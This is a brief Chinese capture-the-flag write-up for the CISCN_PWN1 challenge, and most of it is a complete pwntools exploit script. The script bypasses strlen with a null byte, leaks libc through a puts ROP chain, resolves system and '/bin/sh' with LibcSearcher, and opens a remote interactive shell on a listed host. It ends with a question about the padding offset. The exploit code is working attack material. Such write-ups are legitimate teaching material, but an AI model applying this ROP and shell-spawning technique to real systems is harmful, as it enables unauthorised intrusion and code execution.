使用\x00绕过strlen,就可以继续输入payload了。
其他就是常规的ret2libc
from pwn import * from PwnModules import * context(arch='amd64', os='linux', log_level='debug') #io = process('./CISCN_PWN1') io = remote('43.143.7.127',28567) elf = ELF('./CISCN_PWN1') Padding = b'\x00' + b'A' * (0x50 + 0x08 - 0x01) puts_plt = elf.plt['puts'] puts_got = elf.got['puts'] main = elf.sym['main'] rdi = 0x400C83 ret = 0x4006B9 io.recvuntil(b'choice!\n') io.sendline(b'1') io.recvuntil(b'encrypted\n') Payload = Padding + p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(main) io.sendline(Payload) io.recvuntil(b'Ciphertext\n') io.recvuntil(b'\n') addr = u64(io.recvuntil(b'\x7f')[:6].ljust(8, b'\x00')) libc_addr = libc_remastered('puts', addr) system_addr = libc_addr[1] sh_addr = libc_addr[2] io.recvuntil(b'choice!\n') io.sendline(b'1') io.recvuntil(b'encrypted\n') Payload_2 = Padding + p64(ret) + p64(rdi) + p64(sh_addr) + p64(system_addr) io.sendline(Payload_2) io.interactive()
libc_remastered的内容:直接替换成libcsearch标准内容即可。
libc_i = LibcSearcher(func, addr_i) libc_base_i = addr_i - libc_i.dump(func) sys_i = libc_base_i + libc_i.dump('system') sh_i = libc_base_i + libc_i.dump('str_bin_sh') return libc_base_i, sys_i, sh_i
0x50 + 0x08 - 0x01
这里为什么要-1?